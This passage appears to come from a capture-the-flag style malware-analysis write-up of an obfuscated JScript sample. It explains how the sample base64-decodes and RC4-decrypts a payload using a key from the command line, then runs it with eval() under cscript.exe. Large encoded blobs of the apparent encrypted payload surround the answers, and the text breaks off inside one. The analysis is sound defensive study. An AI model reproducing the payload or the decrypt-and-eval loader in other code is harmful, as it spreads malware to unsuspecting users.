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";return qGxZ;

I was then looking for a large string that could be the next stage in the payload. The one that stands out most here is y3zb().

Question 10:

The function LXv5 is important, what variable is assigned a key string value in determining what this function does?

Answer 10:

I am now looking for a variable inside this function that is set to a key string. Its being set up at the very beginning of the function: LUK7.

function LXv5(d27x)

  {var LUK7 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;var j;var n6T8;if (d27x.length % 4 > 0)
  return;var CHlB = d27x.length;var V8eR = d27x.charAt(CHlB - 2) === '=' ? 2 : d27x.charAt(CHlB - 1) === '=' ? 1 : 0
  var mjqo = new Array(d27x.length * 3 / 4 - V8eR);var z8Ht = V8eR > 0 ? d27x.length - 4 : d27x.length;var t2JG = 0;

Question 11:

What encoding scheme is this function responsible for decoding?

Answer 11:

Simply looking up the key string online revealed to me that the encoding scheme is base64.

Question 12:

In the function CpPT, the first two for() loops are responsible for what important part of this function?

Answer 12:

The question is talking about this code:

for (var i = 0; i < 256; i++)
 {
  AWy7[i] = i;
 }
 
 for (var i = 0; i < 256; i++)
 {
  V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl];AWy7[V2Vl] = qyCq;
 }

On the face of it, there is an array that is created calld AWy7. It is then filled with numerical data, which is then iterated though in the next for loop. I was a little stuck here, but this is part of encryption for RC4. Where you initalize an array to be ready for encryption, which is called Key-Scheduling Algorithm.

Question 13:

The function CpPT requires two arguments, where does the value of the first argument come from?

Answer 13:

For this I need to follow the trail, I will separate different parts of the code in the order in which I followed them.

function CpPT(bOe3,F5vZ)

ES3c = CpPT(ssWZ,ES3c);

var ssWZ = wvy1(0);

var wvy1 = WScript.Arguments;

The CpPT function → ES3c variable = CpPT which takes 2 variables → first argument is ssWZ → ssWZ = wvy1(0) which is an array → which gets its data from WScript.Arugments. Which is a command-line argument. The format for this answer is a little odd, I wouldn’t put a dash normally but that's the answer.

Question 14:

For the function CpPT, what does the first argument represent?

Answer 14:

Knowing that CpPT is used for encryption, the correct answer here is the key.

Question 15:

What encryption algorithm does the function CpPT implement in this script?

Answer 15:

I talked about this in question 12, the key-scheduling algorithm being used for RC4. Which is the answer here.

Question 16:

What function is responsible for executing the deobfuscated code?

Answer 16:

Knowing from a previous answer that the use of eval() in code can dynamically run something gives me a clear answer:

eval(ES3c);

Question 17:

What Windows Script Host program can be used to execute this script in command-line mode?

Answer 17:

This was a simple search away. One of 2 answers popped up when looking: wscript.exe and Cscript.exe. The answer for this one is the latter.

Question 18:

What is the name of the first function defined in the deobfuscated code?

Answer 18:

Next its time to look at the rather long string in the y3zb function:

function y3zb()
 {var qGxZ = "zAubgpaJRj0tIneNNZL0wjPqnSRiIygEC/sEWEDJU8LoihPXjdbeiMqcs6AavcLCPXuFM9LJ7svWGgIJKnOOKpe5/T820lsv+DwYnSVB4fKV010kDuEZ/C8wCcWglLQmhMPV8CS6oH/YX8eLiBhN7XZXcixEzi8J1wyMdiI7wD0IKpQoioYV7MP3DsuZk8YxJOkWzoSQVeEuljU2NE4wElYlVZ3bToY8hHW07m4BjZ39zj53vgZX1LQMEG4j4PtoCJZdRN9SUNyY6Y54PCG9SAmHZsz1+v4QpE96O23ckYfzGIvDlwZk9dbZB+6nMSxwl9p1dB8/+u0uNi2mDZ4mwSY4INb4MqbFqRvkNVb36uxW4qM0oCRSpd981PLZk7Y7GOXfZOTGXhIFSJ11ynDo/v3xgPllJSZvFyD3Tw5EE2kemAKI+G1Qdny0ohmeYJO0dhjfOz2HVvEqfyxcDWvhWrCPjB5QS2m78p1R/34DKqbsykWqkZGwNjT31N6S6+XvcZIaHERC11+ePvAo8BR1y9Ldwr999B3Se84xCjfxFNcmFBnDsn6RGigMpH9AfeC4i21XdvrLux3ko40lN1KhVTIpeKoI/U1OfPgzwT8fWJm/J6lzWz/Sby+69/KMWDB+M0UUdVEdL93RkpRkSNQiSBU15sNyM6uAne8ySFN45/fs1zmESctw65YxFzNOwSruCzxb0crp7TdJFcy1c0I16jAN3JkGCovbz+tMoBsRR3MJYMpnO+GwcDKRHsF2JKmG2GhOQDPONnjgGpFeSq78TqTxVOl1uYVZWFDHQKyWGas5jh2Iq3Fx6UhAlmGBG3uMERelUCaUhJ+3nqNReZ+0PJEUXaOjxU6pTCfaWh4d/jDlgFpJLxkpX6ZJmBSWIXv+EOujH5AE66hkWDFjfiMnac0ZA66I1i8Xzl6TUeO9t8Ro8o/N7EnCb3rFkNGIYAo/IhcBx1ikh7M5p45ToLfxwPuvz7J6jWMRa3ROlZDQQGD1PGCjCAyLYPy0E/krYAy5GFje8MpL28xmg+we3E7KXsSaLRTT0TwXG9mvuosfhiLrjIDpcMc4wF2vwtnoBXmL7mO7oEDtpIgOIuZhXGQqLUvfgFY9SLGlqOfgubxSoos3+SrrJjp/GkKPE45ATGv0gB/rS7xx611nt0rCjOYAisMWUCmQ9NgmTYY6QOZjdhytQYmO2ZVFQfl3DuJ2PffaHWHhEjg4QWaEAqmszSTpIl31TPD4JAZdrYDfTllB/Yi0ho2mN1dtvsrgCbXBqVUXmDrpEZDSz7bOFqPjHAfS1C/8xP6o7PHQsFKzcS8v11xCNnZZ9MMw3I8A91IAqhHZaW6NDiJtMDKRw2cF1W+Ff6Th+OEIqMv4niDsCt27kshuiqllu32f2qJx6hEmqBmEiMudmBqTOu4LuqL6Ul3n4Y/v4FlW4+dTUsXGeec8f7eq4Y22lg30BVZkvdocvnw3X3iX+Eht6aPJgSuQKtD9zZIqLFOW23zolE0Owg3wpom2u37YjR357zjt/a9qw3an2lRSC1HCAIS/AffuiP4YRvflHKhbj5NlqqrZQK3sB2ozQtOWaGp0cL1ST2GM0rWD9rcQxuo0Yq9UtH1T/BZnIyqvMNGmPHjdIv0ACKD8GGJh18XurzD0kGvCo5tU+QC3Z2L3A9JVglBegNhFD12TBIiA1zpeX5TmAkRqNcMm7rsgiU8Mydx1fSC9MdlR3Ggds/jMzJalWqxaWmPuWQroyiKADLlz0OmvK7mBo48mpxDVujSxdmLTPtUu5BWSsKtq4eOpkg0R1agp/kj7zlLb2MXMgY/QZEyrNflmjaFeWF2cQ1Gxrhcq9OsJAR2wDCxchV9Aw4+xdIIeRJyUdoyuE7Xn9J4rYEHzIMm6sQsKtA/x5EphFJSS8vlbLGMsCL1bRWYW+FkxbRvQowUiGAwI9jLHxuClGHXxb2vJuUPBZ3mjqD28xqYd9OlKIeT4qwZNDDeMgLCwQ1qf85Vg4RMAd9bUXKDWoLvb+u+Ix0CGZ7MKHWj5SblitCyXsyiF137vrJezI7zbbG2LnStfw1GiEARDpb4ZEJPSqvPU6JY82HxPBSi9k6f7L/TC7bKIEmrqbqVrI25P4PtMSvBfC9UdaeHJCGhPdx7fHHV5Bi0kTacNSSBOB4WIM7kXFqm5Bx2u4/o71jRhGH5xjaIvM1DzzTVPnWqKOVX2DzVph6g0fTs44kibqQHsVAhARuOqLU4M4ycNzyJXzR1TasSLCY4ixgGf4EjsAjHWYcaRQFgV7lZdrrpY/sOZ8NZH7zPP/b4I2CHyhgdX6IvYDSOtopYITUq3nZxRFvsjdQ26zEWgPCOylplFbzWE+Gz2blJG4lUNV9/haMJKtfgNAzG5PpVn8RGPHpM268ysCzRtfFkPlDSWOfqmyzttWQPxVtybPOaNamj/rNtRq9bcH0J2I84LYLfVI3wVtAKAHqNx4w05PqC1e3Nl5qPJMFi2GeRW+hhisznoamQFMGxm1IKvyUOn68WNd1isE5/dgv6mel/juvfxj4b24rsh4EWnJighMWhqaw/B+yoSBS2fpC8qEPiwB/FjiXD4rP8bHfmW9fBlUUh60dxZ+4Rf2KvzCNW7fLWPlJyuGd9dLWeR44A/cC3i3Xj7hVxfuL+/EOhNlHkdUUH2Y3FmVsghM9v4WcEOICvVoaQ/c3ldF4QpTWNvREO3JLoBsEpLCMPjXARsGLCxMl9EkozPOWl1GPQeELFMOeLh5csUxcVDC38ONT5ovykBA4UosA6Trm9twMG1cC6D9flbJxY6/k7/ijub1KwE8Tp++E+QLnNijJ0nZL1AMT6Te1I0EYBuxX22y4b8oz1MPkIsRZ/kIkSx/wOv42Y1EfZE3roewbhazWdn5/geeMd86Z/O/yr5DnzAzIfDrctCC3aV2QTbKMTADBvRVC96cCS2/sEwIR9SHJfbtPt2mPHRTaHEpLPZVvincSGzrIxuYnHTBc2WddVyMLXrI0xnzpgfy/UigQTtElM2OpzTUCQGRfa5RY1JvLI57U8jyUZlJK3GffNKw/2WK30vREdfn8tkk8EqLWympJpOFs3Pu/k7Cm+YN4BtGEIWYw6rjKzlLucVjMCJcFZ+/aMomT909n8XmfVqIuUXM5k14M8Kb9ohtaiqcTuIX2VxDGJrqVnefAjUOvA0ySbl7sQ6ATbC1N7E35dikhf3ClthUhFVtWK7OtAZGMo9y7wwzACl2gm5RTupVQPKj3YRh7OMbYkMVv79jaA93LoljToYBEKil9yz1DITUwMDi2NShPE35noP89ulEisrzFWKg/lWu+ZkOTse6X1Mg6mk4SVaSKy/DFQm1hhRtvv9ic2x+XYFkk6b2VpYllHfrpO0ltjOuOCNDQBwnDvCVEJidkRAgZesihMMzkMtu9PkoHmR3ZCndXZ0Xpudkf3VuOqISY6zt1vWiVk+qdl4AtylyXs3oEtMMY7E2ETsxBrAnQwK/V/v/GmG4muHzw+pHMdyXGBKeu5bmTeCx47WUFa5MGUNCfVlTg2RPsGDhwxl7METiX23uDzw+OY4wrzLKotBXMu7/sETcMe/oU4fouhZdinuSsRCJT2lpLDvyzw6la0Q2QtWnXufQOMaMx/q35xqsC7XBAd8s7ihQZPwWkXpvVyW9ehVCp1D+ET3qnEtcOPg1+ie/Utr8aMhfNO9M8Z83agXRJYhnyR1qEIvlIw0nGsx3dJX3HNeyknXl/8sgq7qRBrInaMVhUyu0RTs1xYk7uVH+W4PEtHB2WraNMde4vywqNMFGOCTWNK/J6VjPOwazfYG8qfbLJ7l4/HORM5zTkPn6EZ43n+SrFx+HQG66HT+jYiuDBMvupPFMxkj7JXsy7dJz5JIevygO5XOIgJ7drAH5ORofN7v6BSdlahccZsAwObwu43Jf+Xdq/xMtb+AmwH51r8GGcvwu/8Ej/geRGbJSgswPqcXP9FGblErTpwuJkgjvzHUdMXyALPY2xfzUzs+ll8Synhk2q/jTAlZ92Ihk2rsc3fV9PkQiOu86NgxB/WDgM6S2JHaG9AXjPkli4q56SBoPoFsUCvJoYPCbfTPmePll04c5X+hQYZFKneTH2o98evqrI/+oxAui9kU+yz9UFUgW4wfBNHUrpEAA7ONkZpYRUtPliRKEYhCKSVWXQ5pmQI2Y/g46iEQ2U37IRfmD+RGSYjaXrLZpmb8j1cxOyGQTWoWl/1dinwXon3gbIcqrFg30ASumcP20m76/nZmDU5P38b4pmh0vrl5eVDp9ctHDupU5AXZBfuvzvw8QEDXJuKxIVvQGrRbHsPNUDSeWno8wmVWhGrH2DcdqVtji/KhsrIJwDUgyDFeRRcHTl4kQWBnuB/fjBPeTv2eAOgMGlLjmIw0gPvaXeHk87W1JskSzizJZndymGD/Lm8zb9lg7jx7PnxJQDRwmI+5ZQNeeDcL3lKJPjgq/ahbMPX3NEtr1dBQtUE7hxMYpzXRNT3YDdkZLnMmIbHw8JJ4kg0sL1UXDPhkF9Qwav6XctgwkmHBxZ4ngNPDsLhvnBcHSOyb2qmjmnVWk4j6jkV9E2YeoYr48HnPAeuQcFReEDZ+GtDZWxhTfX9m5+M7/ytliMMmoYMzuOhpxfAf4G0DQl7PadQ52v4zKUisOIhcbAx8lLgV9bBAyFI8CtrAL9LM37Ju6cUggIB0BlE2TVzPnwUeeuLkg0YhKBM4e6Rnu7ykUKwB7a3fdez8bwon46+ebsT9Jam32lJ7G0jeT7Lbe+fwcLIZBeXisPqMArUfgn/ihkpcMopvVI0gSpyN23x7b7lA43a80mcy36awZ6IJIexPkCotSGcbaVNjgQqZjhyZSrFebaitAbKf7IvQjev927qRhuwkwV7PY55H7wybUJZbHGcwAcYyTmYtRw4AE556hvnKh8ZRND/jfpit8ZHD5DDY/f/qtxU/X7XYowep49J9sVefybHKc4OtE+RIx0VfvBwmiSMk2j2SBcKlbUc3R3Mgp83jF8AGCaIhLj0F5QD5YIPcq3OD+4J21Y3eqcDQYtaN4RK06bebSoU/r2F2O3jKYBrMy81InPkkYa+AY6jLUoyDRZy+/FWAv8i9IE/dubiIWQB/mZaolzMTR/b8jlcjquwNFa0Lgf9gCI2lvgnkzawxdNB5va82WzZFEcEE3A8zr57ajNQty0Rf8urmPARsEIt4OZnnFky76eoAi6I1AMPC4bl+CLl5eoGjKOUqZkTNyNqkDSDulIwEqZKlzEffKFr8gFpxYSPzlQ95eYURBWCkQnTZFo/aGn7W/SOvKKY3IDy1VFwAN4Ul6W/rHpnQ6zealP/G98felyBowwS6yHek2W9tX5xVEWfj4frmG15zsUJxMmZqQFJIjM+BEOi5veTSHO7vnQG/C5IE8sTowBUle2nM87Y0CCkW5oQXUqVZH1QAPi3+E+JmTMeoCZmV4wdz+sfhr0zbxijfAWnJgBNkfVgDUSw5EqgTYg3nC6m5jICsjsW/LaOVxudtofVlVIJQ164UE2w/srmPz5Fcf4/3gID255D3qTJVtcXtnItbVNxs5pnUD7Mcz6qNigy0sVxQnfA8Vdnj4c6aV8wn3kIRQTMcajBs/23TlFGcp45r1HuEUHilX+oyhCq4Iwk7j2vwWTo+1OOX9GXQIfuHZhePpm3a6oOoR3Qg+7+pu0iDzLPtdBrSaCHL7kQFvqjba6/1Sed52+DBj6A4zdQOJF5MPzwt/AFmiY8xsP2EW4pJS4r1YCIjW5v0Khf+6lDjdJwuSVeyHwtPhfzOM0EvzG2fA9x7LMIfIvLC+YonM6/yNHsWzDwX8apziqa8FEYtLy7FrCodH9MZqW8xBBYljG3XuslEi1i2aU+o7Ht196H1GLMWe9DkTH2K6EqYvLnA1gP/nmpgJXqcKO2ZVDuZqSvYXtYIB0fiyHpow+S/A2m5ETuw1wQsNkke6IvFVPup2exL9usLyLKT1G4/hjjbVJRZnEY2j7VN50Nyc4Rj1K2JCJBFuyG8wCUXZ8e+hL86Ok4/1puV+iMqj5CRyH6j6s2FyM7zlWU99Zc8C5IbZsLclcd8vbzSUzDMNOhpt3tB/Cvt55Ey3XOia7DktWiT8AAxO1DjNJo8qhlV+Sd7NPDhAdesGfGxjaXZM1A8Yx/ET3J5MIgQyjUlBAz5ohcpX4+WCDrDUCi7CPS1OstehKBJvpUHCqxY8suQkZSUwVDKGEyXKunEicnMWipIubinrsAeI4lxgAtjLMTlgyvrA9Tmt1s+dXGAj6on24YscjGd+u7h9fYL0n/7Zn7NUpsy31zc92RlN7rrP86ZNHzTEMvJ+4WdLQ9OWx1s1uVfMWKWmBZ2LFE/xHiVYCfWB9rnNViTxTJKRXB6q0kWacJr9hAbzA5VOXpBJCdOxLgMBW6JStiEkp+lcMyWe9h3mrgupyu9HDdGdSZTP3K+EJbccHBtoZ5uNdlgLvMk1S2+vpV6pSzHRK1enjGLQrz3AGJrgop595jEjEZp+ceh/SnLuxoW4MyZWr9kI/VQWGiRVQedJAF10eDljMQZVCw1J3l7BXssVnnWNph9qsq7kCmMyBGV3Tt6n608rKQ0nEAlIxnbYZm0OziLh54fYP8uvExpSD9yWwvBMrdNNBN4tgJ7udtyAnsCxjcXsgelt9lDPNaqLuBRSqVETxdo1siBumKOES2htH4SvnzVLvoqqZo+sT6esSECuk31GesVWNT/Xq+89a85MO+8X+uX5u70src0oqgncBD8m9vOaN2ku80RIOuxGlGmJhE/RXnT7OlrtKuD+deE/mnkMTYxwlPFHuGOoTrhazEezHVChemBWqryN6lD4j/nvSFRL2/KHWh0s+9cJfcnL4zFx/lJJYNUecDmjjHKxH1IJs1tp/2SSAUKsE/U16LIpEo0wfraad3K7pIiYC2pGC5foY93mZINrjJcrAgi7jzwUOjNJVDaPq+zvxsOdHIjfNv84P9/sAhDuuZoWh6/JTvVV3EsQ3hs7cXIccLcViw+CZbkPjo1Ikwt7EZpA5yfGdbjIMHaGUAhXkilEQQbIRiaRbHnWiEp/1aRel40hkFoJoRyi7trkSBE+x0Ph1aYQfUmu4U+aNs7LkjRomvKAxpTiqz/pF0XWgM6tN3d23xxx2HhZa2ceMc8i/h1rxXMNg6SSIECD3IOHU+9r/6BB8pGVEsy1ZdpO4q9weqaDZJLhY480CTMey+weDitD1ctqj2V+yUUSU7R2YOmiLNIbB4bS8PDQWWmCf7VHV9IkLqqsPajer3qVy31GHt0XyYlo9vNmZEbe1RJGu6opLXuNS+FOE4OlU3qC012EAqu8qXyjjESDE6CwVmF2H1Xvy8+2G1UYLKWpEUHvInQV+XBVBevWtUKkdYw/yl+C/9F/ZG1/+3l9cg6+4f0KFuDrVNXB6i+JLRbIzGHKJRVMklRBy8oGBGZJlfkALEbVDNUmOf6/oB/1WMSUlZjVjp4lgKy/UYV6/G95OKJPXifhyoASzwJ09NhOPEUCrucOxZwafKx/OFBfX4fgnNmZ/G7bPNc1MzVg598smtm1XyOaIyPerg4fyus7yZf8ywrZLMoVqDe282CtESnnKzD8SVzt09nBhLMiECKeCCOpOCwzvcbyrX0PUhwKGT6W4kDn1Thjfr1iKiYhhPo903Ioer7BZto5ngibOMqxXQVplrL+RND4MYKXFgTesndTXYMWwdS7XWg2r0N5fyt4ZIa6C+NUt5+iWNc8rHdIUvG/uttkc57STE/YosqyENQMykGVIpnZWOentQMQlwjTC4chvnjHZXomSg3vyQau1sW9JODvZ41UNTPudldmGS7NkbFF1x+kL9sF1AZc58kWEvvCKTaYpFGmReb1I4JvOpXOc4VPZyAEeFEpLmTm1Y++KgrbyjPXOG4vYXoboRWJVm3eXiIftqHYjHFwTdfs5qCJK0rTjx3CTpYaNeWnEBCgDPQwvrGZBYVSWxM92zU4MD2jbDT7uEh991SauxASgqrwaemlMktwVeKHm+c3VHhoghDzLKGjVczmYbYdkl1BsLjUpD8q6WvC66iUn/KXNa9gzytM1SaqnkFSavv6PC/hd9gLyQ3sxHj8YrjjCkVd4/SOzqe4B4sxmtmZn/a2T1MB8cpO7P4hXhKeBD9nz/zPmqU9pmGeZYcTjnDee1kNx9JCNHwXS+D/SwOG59My2ptuH2CiA42miWnZSzKyPHi7lkfEI13193R69OndQElm8RDOr0yQ+ieG2XaQcE+98oK7eycBGN9LIfRoGT5kDlBqVWFIUrpgK+5QFoi6XTWkvDlXQ0iX2gpQAnmyBPp3VAVnxG1v+ANrezVWfedUHrb6zU/FfG3Vl3Ckf81waSFdlkFn41Wx6QpPSNmvQIhHnerlSXrG/T1XXSVU8cW55kUexeLEASN9yYv8VhK8PA0Lw0ZFUlaaqyS+kZ6Kq7EMnb+hCCuG88GFA3OK0Q7jWf6ZqAO+dGO7kTFQ8LxZVcC3NSNc/8b+N3zUJ8XkzgYNjYxVcAU2ZqCG+0/DZ38qP8LVcsnVNJjnhucLvf5ECcRTrwrMGjmXngia5ACmtjRe5ste0V/sW4ggeZSzdcBUHBvF+bClUr8HD70Tv/2k7DWJojWbPEcemCdmZ0gu33e1UA9eQ2+VQNLXL87gEK9qcn0VJ9luhpqTprYhjoIOMXsSJQouN8rRlfWmdc1ixuKl/DCaZTiUPYoriGz37oFnZbwLReAYzoJevOA0IlBkqGyxkf15bx5d1CUQd9HPb4/G1TEU+D4oaHGNUsE2yioZ4j67Qgtfug9ocqitA1gpVsfEqR9V6bIk+ZnBV3DhAdUXTKkyDBnyNJzw5nb+uat4TiyZpn2yn4WiR5H7T88vRQBVa+O6iQdX+Rl8v40CUD8aPe4xFAFeSUiQ36NWSvMDQ/1rBwkj8al9KY5E01/iBeM3X4vkpDBU6KU6knSpcTjaSkI6T54IUe+aQugNWZmQp24f68JvRXEhP2qDbSC/Kze9Ft+8s4/XWtZjfSwkKvFvg/TGJshzioLuVKp/VHk3+bV/V5nYrxsyXx6eKICfS4q3kj+dKY9ETPJZ/qFVlnxItJd01fZYK5OgMkQPpTma30OIhpDs4oMeugaHBx5RxLPEieixhwH2TO+f+vcv9UOEGRiM08Ew0nVzpIF9R1klH/EVdDAJdxZ4ildRG/E2Y4awNEQOauRDllijlj8Vl2Y8nnCH2SvgwF1nZMZvgFCgt1AJuu76pWVo/ABFLw/bZ/7Ux1jHWvEBeTMSe6ZejSLo2JNiDC1T569mtIkex0X7ZZdzbzMj9wsrN/Et7gzPCUbZumvA90p9wvKyGqo3khhbyZUe4qWNtPdoTE5jobGzo01GdAGYKUHPE4jMBQiAhGjP9QCaxgp72lFZVzh2nWU8VyM/BGgJkK9vZTk0wxSp0EV1WktGmwIUaVETvzXatkNcYy736T+WPRXdtcOWKmC46MsXhUPxotefUMrjougzZgjJI8X7WXFXwH/9jPDIV8Y1Mh6HNqjIQCmOvmw3l12zrGATUclvCLn9isDJaKjjlx/UYdQYLIZHbFHVRPQ8vuwOwWU/vZIHu7T0WnfnNrBsrB0EjwO+5009mwtgPLNYn9NnpKrOwNqTawZdWz5YJouIWChtU3ht5qnp/Ym10SJyX6D9VHvOgc21rjaQWI+tzdybcGCNfQwlsBjkNTRXP1ec54J2VaND4vXBAWXEQOsHYMtGbI1BqcWKW7duj7rt+LYukyMzgXZ063Sdh7oJJ6MHfgQwpKXJV7u1cIC1xgt9WjllmdteHsnHn/HkgC1dFXZmStlOkTMjAae1a/GEkg/pJd28fdH//rtClx6KX70PN/JZUMRWeID8ZYyoIHXVYiYNNpuZrqkRySUx4IgkCIFfu15rDkWG+7UuNDTvbJX2g